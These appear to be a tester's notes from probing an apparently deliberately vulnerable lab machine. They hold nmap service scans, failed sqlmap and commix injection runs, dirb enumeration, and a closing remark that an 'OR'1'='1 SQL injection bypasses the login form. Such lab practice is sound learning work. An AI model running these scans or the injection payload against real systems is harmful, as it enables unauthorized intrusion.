# basic discovery: 

root@kali:~# nmap -sV 192.168.10.188

Starting Nmap 7.01 ( https://nmap.org ) at 2016-10-19 17:47 EDT
Nmap scan report for 192.168.10.188
Host is up (0.65s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
3306/tcp open  mysql    MySQL (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.73 seconds

# kick off a deep scan while i check the web. 

<kiop2-1.png>

# no dice

root@kali:~# nmap -sV 192.168.10.188 -p-

Starting Nmap 7.01 ( https://nmap.org ) at 2016-10-28 12:21 EDT
Nmap scan report for 192.168.10.188
Host is up (0.11s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
827/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 368.26 seconds

# time to start poking the login form. 
# set burp to system proxy
# turn on spider
# reload login form and throw test/test at it. 
# run dirb to see what else is hanging out. 

# only result is default apache documentation at http://192.168.10.188/manual

# sqlmap has no results worth discussing. 

root@kali:~# sqlmap -u "http://192.168.10.188/index.php" --data="uname=test&psw=test&btnLogin=Login" --level=3
         _
 ___ ___| |_____ ___ ___  {1.0-stable}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:20:49

[14:20:49] [INFO] testing connection to the target URL
[14:20:49] [INFO] testing if the target URL is stable
[14:20:50] [INFO] target URL is stable
[14:23:18] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

# commix has no results worth discussing.

root@kali:~# commix -u "http://192.168.10.188/index.php" --data="uname=INJECT_HERE&psw=test&btnLogin=Login"
                                       __           
   ___    ___     ___ ___     ___ ___ /\_\   __  _  
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\   
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.4.1b-nongit-20160226 }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2016 Anastasios Stasinopoulos (@ancst)
+--

(*) Checking connection to the target URL... [ SUCCEED ]
...
(x) Critical: The tested (POST) 'uname' parameter appear to be not injectable. Use the option '--alter-shell' and/or try to audit the HTTP headers (i.e 'User-Agent', 'Referer', 'Cookie' etc).
root@kali:~# commix -u "http://192.168.10.188/index.php" --data="uname=INJECT_HERE&psw=INJECT_HERE&btnLogin=Login"
                                       __           
   ___    ___     ___ ___     ___ ___ /\_\   __  _  
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\   
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.4.1b-nongit-20160226 }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2016 Anastasios Stasinopoulos (@ancst)
+--

(*) Checking connection to the target URL... [ SUCCEED ]
...
(x) Critical: The tested (POST) 'psw' parameter appear to be not injectable. Use the option '--alter-shell' and/or try to audit the HTTP headers (i.e 'User-Agent', 'Referer', 'Cookie' etc).


# try dirb one more time with a healthier list
# nothing there. 

# i'm doing something wrong if i can login with Administrator/'OR'1'='1. 


